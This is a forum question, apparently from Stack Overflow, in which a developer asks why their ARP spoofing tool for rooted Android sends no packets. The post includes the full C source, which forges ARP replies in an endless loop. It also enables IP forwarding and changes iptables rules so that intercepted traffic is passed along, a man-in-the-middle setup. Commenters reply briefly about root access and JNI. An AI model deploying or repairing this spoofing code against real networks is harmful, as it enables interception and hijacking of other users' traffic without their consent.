How send ARP in android
I am writing an ARP Spoof application for android (using java and C)
The application build .c code and uploads it to the apk lib----.so
When I run the application, it does not send an ARP packet.
https://github.com/BlackGhost0051/Nephilos/blob/master/app/src/main/cpp/arp_spoof.c
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>

#include <netinet/if_ether.h>
#include <net/if_arp.h>

#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>

#include <net/if.h>   // ?
#include <netpacket/packet.h>
#include <sys/ioctl.h>

struct  my_arp_packet{
    unsigned char h_dest[ETH_ALEN];        /* destination eth addr */
    unsigned char h_source[ETH_ALEN];      /* source ether addr */
    unsigned short h_proto;                /* packet type ID field */


    unsigned short int ar_hrd;             /* Format of hardware address.  */
    unsigned short int ar_pro;             /* Format of protocol address.  */
    unsigned char ar_hln;                  /* Length of hardware address.  */
    unsigned char ar_pln;                  /* Length of protocol address.  */
    unsigned short int ar_op;              /* ARP opcode (command).  */
    unsigned char ar_sha[ETH_ALEN];        /* Sender hardware address.  */
    unsigned long ar_sip;                  /* Sender IP address.  */
    unsigned char ar_tha[ETH_ALEN];        /* Target hardware address.  */
    unsigned long ar_tip;                  /* Target IP address.  */
} __attribute__((packed));


void listen_arp_requests(){

}

void arp_reply_send(char *iface_name, unsigned long src_ip, unsigned char *src_mac, unsigned int dest_ip, unsigned char *dest_mac){
    struct my_arp_packet arp;

    memcpy(arp.h_dest,dest_mac,ETH_ALEN);
    memcpy(arp.h_source,src_mac,ETH_ALEN);
    arp.h_proto=htons(ETH_P_ARP);

    arp.ar_hln = ETH_ALEN;
    arp.ar_pln = 4;
    arp.ar_hrd = htons(ARPHRD_ETHER);
    arp.ar_pro = htons(ETH_P_IP);
    arp.ar_op = htons(ARPOP_REPLY);
    memcpy(arp.ar_sha,src_mac,ETH_ALEN);
    memcpy(arp.ar_tha,dest_mac,ETH_ALEN);
    arp.ar_sip=src_ip;
    arp.ar_tip=dest_ip;

    int sock = socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ARP));
    if (sock == -1) {
        printf("Socket creation failed\n");
        fflush(stdout);
        return;
    }

    struct sockaddr adr;
    if (strncpy(adr.sa_data, iface_name, sizeof(adr.sa_data) - 1) == NULL) {
        printf("Interface name copy failed\n");
        fflush(stdout);
        close(sock);
        return;
    }

    strcpy(adr.sa_data, iface_name);
    adr.sa_family = AF_INET;

    //sendto(sock, (void*)&arp, sizeof(struct my_arp_packet), 0, (struct sockaddr *)&adr, sizeof(struct sockaddr));
    if (sendto(sock, (void*)&arp, sizeof(struct my_arp_packet), 0, (struct sockaddr*)&adr, sizeof(struct sockaddr)) == -1) {
        printf("Failed to send ARP packet\n");
        fflush(stdout);
        close(sock);
        return;
    }

    printf("ARP reply sent successfully\n");
    fflush(stdout);
    close(sock);
}

void str_to_mac(unsigned char mac[ETH_ALEN],const char *str){
    int i;
    char *token, *ptr;
    char *copy = strdup(str);

    token = strtok(copy, ":");

    for (i = 0; i < ETH_ALEN; i++) {
        mac[i] = strtol(token, &ptr, 16);
        token = strtok(NULL, ":");
    }

    free(copy);
}

int main(int argc, char **argv){
    printf("START\n\n");
    printf("Interface = %s\nsrc_ip = %s\nsrc_mac = %s\ndest_ip = %s\ndest_mac = %s\n", argv[1], argv[2], argv[3], argv[4], argv[5]);
    fflush(stdout);

    char *my_interface = argv[1]; // interface name

    unsigned long dest_ip=inet_addr(argv[4]);
    unsigned long src_ip=inet_addr(argv[2]);

    unsigned char dest_mac[ETH_ALEN];
    unsigned char src_mac[ETH_ALEN];

    str_to_mac(dest_mac, argv[5]);
    str_to_mac(src_mac, argv[3]);

    system("echo 1 > /proc/sys/net/ipv4/ip_forward");
    system("iptables -A FORWARD -j ACCEPT");

    system("iptables -D natctrl_FORWARD -j DROP");
    system("iptables -A natctrl_FORWARD -j ACCEPT");

    printf("\n");
    fflush(stdout);

    while(1){
        arp_reply_send(my_interface, src_ip, src_mac, dest_ip, dest_mac);
        sleep(1);
    }
}

I test this code on my linux laptop, it works, but in my phone I see “ARP response sent successfully” and in wireshark it is empty.

Please clarify your specific problem or provide additional details to highlight exactly what you need. As it's currently written, it's hard to tell exactly what you're asking.

https://stackoverflow.com/questions/64086282/can-android-apps-send-specially-crafted-arp-packets says you can't do this unless you have a rooted device

Last time I did any Android development (back around 2011 to be fair), you couldn't just build C code and run it. Everything had to go through a Java JNI interface.

I use ROOT phone to test. ( JNI I use to compile .so files to apk after that i start it by Process in java )
PROBLEM == dont send ARP
